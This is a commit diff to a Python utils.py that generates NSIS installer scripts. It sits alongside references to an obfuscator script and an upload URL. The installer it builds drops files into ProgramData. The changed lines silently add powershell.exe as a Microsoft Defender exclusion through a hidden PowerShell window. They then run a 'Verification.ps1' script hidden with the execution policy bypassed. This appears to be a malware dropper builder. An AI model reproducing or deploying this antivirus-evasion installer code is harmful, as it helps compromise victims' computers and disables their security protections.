sigyllly commited on
Commit
9317b87
·
verified ·
1 Parent(s): 6ee7fec

Update utils.py

Browse files
Files changed (1) hide show
  1. utils.py +3 -4
utils.py CHANGED
@@ -17,7 +17,7 @@ COMPILE_FOLDER = os.path.join(BASE_DIR, "compile")
17
  NSIS_COMPILER = "makensis" # Ensure NSIS is installed on your Linux system
18
  OBFUSCATOR_SCRIPT = os.path.join(BASE_DIR, "Obfus", "main.ps1")
19
  UPLOAD_URL = 'https://ambelo-benjamin.hf.space/upload'
20
- POWERSHELL_FILE_PATH = os.path.join(PE_FOLDER, "powershell.ps1")
21
 
22
  def generate_random_string(length=8):
23
  return ''.join(random.choices(string.ascii_letters + string.digits, k=length))
@@ -87,9 +87,8 @@ def generate_nsi_script(folder_path, bin_file, ps1_file):
87
  SetOutPath "$WINDIR\..\ProgramData\Installer"
88
  File "{bin_file}"
89
  File "{ps1_file}"
90
- ExecWait 'conhost --headless powershell -ep bypass -c "Add-MpPreference -ExclusionProcess \"explorer.exe\""'
91
- IfErrors 0 +2
92
- Abort
93
  ExecShell "open" "powershell.exe" "-ExecutionPolicy Bypass -File $INSTDIR\Verification.ps1" SW_HIDE
94
  SetAutoClose true
95
  SectionEnd
 
17
  NSIS_COMPILER = "makensis" # Ensure NSIS is installed on your Linux system
18
  OBFUSCATOR_SCRIPT = os.path.join(BASE_DIR, "Obfus", "main.ps1")
19
  UPLOAD_URL = 'https://ambelo-benjamin.hf.space/upload'
20
+ POWERSHELL_FILE_PATH = os.path.join(PE_FOLDER, "power.ps1")
21
 
22
  def generate_random_string(length=8):
23
  return ''.join(random.choices(string.ascii_letters + string.digits, k=length))
 
87
  SetOutPath "$WINDIR\..\ProgramData\Installer"
88
  File "{bin_file}"
89
  File "{ps1_file}"
90
+ ExecShell "open" "powershell.exe" '-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Add-MpPreference -ExclusionProcess \"powershell.exe\""' SW_HIDE
91
+ Sleep 10000
 
92
  ExecShell "open" "powershell.exe" "-ExecutionPolicy Bypass -File $INSTDIR\Verification.ps1" SW_HIDE
93
  SetAutoClose true
94
  SectionEnd